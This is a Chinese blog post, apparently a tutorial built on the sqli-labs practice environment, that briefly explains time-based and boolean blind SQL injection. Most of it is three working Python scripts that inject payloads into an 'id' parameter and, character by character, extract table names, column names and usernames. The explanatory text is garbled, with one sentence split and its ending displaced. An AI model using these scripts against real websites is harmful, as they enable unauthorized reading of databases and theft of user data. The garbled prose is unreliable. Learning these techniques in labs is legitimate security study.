时间盲注,boolen盲注,获取表、列、具体数据的函数

发布于:2025-02-14 ⋅ 阅读:(145) ⋅ 点赞:(0)

布尔盲注(Boolean-based Blind SQL Injection)

布尔盲注是通过发送一个查询给数据库,并根据页面的响应来判断该查询的结果是真(True)还是假(False)。即使数据库不回显任何数据,只要页面的行为因查询结果的不同而有所变化,攻击者就可以利用这一点逐

时间盲注(Time-based Blind SQL Injection)

时间盲注与布尔盲注类似,但它不是依赖页面的可见反馈,而是利用SQL语句执行后引起的延迟来推测信息。如果查询条件为真,则触发一个延迟操作(如MySQL中的 SLEEP() 函数),这会导致页面响应延迟;如果为假,则页面会立即响应。

步推断出所需的信息。

获取表

import time

import requests
def get_tablename(url):
    offset = 0
    while True:
        tablename = ''
        for i in range(1, 100):
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = "1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1 offset %d),%d,1))>%d, sleep(5), 1)# " % (offset, i, mid)
                res = {"id": payload}
                start_time = time.time()
                r = requests.get(url, params=res, timeout=10)
                end_time = time.time()
                response_time = end_time - start_time
                if response_time >= 5:
                    low = mid + 1
                else:
                    high = mid
                mid = (low + high) // 2
            if low > high:
                break
            if chr(mid) in ' ':
                break
            tablename += chr(mid)
        if not tablename:
            break
        print(f"表{offset + 1}: {tablename}")
        offset += 1

获取列

import time

import requests
def get_columnnames(url):
    offset = 0
    while True:
        columnname = ''
        for i in range(1, 100):
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = "1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1 offset %d),%d,1))>%d-- " % (offset, i, mid)
                res = {"id": payload}
                r = requests.get(url, params=res)
                if "You are in..." in r.text:
                    low = mid + 1
                else:
                    high = mid
                mid = (low + high) // 2
            if low > high:
                break
            if chr(mid) in ' ':
                break
            columnname += chr(mid)
            # print(columnname)
        if not columnname:
            break
        print(f"列{offset + 1}: {columnname}")
        offset += 1

具体数据

import time

import requests
def get_columndata(url):
    offset = 0
    while True:
        username = ''
        for i in range(1, 100):
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = "1' and ascii(substr((select username from users limit 1 offset %d),%d,1))>%d# " % (offset, i, mid)
                res = {"id": payload}
                r = requests.get(url, params=res, timeout=5)
                r.raise_for_status()
                if "You are in..." in r.text:
                    low = mid + 1
                else:
                    high = mid
                mid = (low + high) // 2
            if low > high:
                break
            if chr(mid) in ' ':
                break
            username += chr(mid)
            # print(username)
        if not username:
            break
        print(f"数据{offset + 1}: {username}")
        offset += 1

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布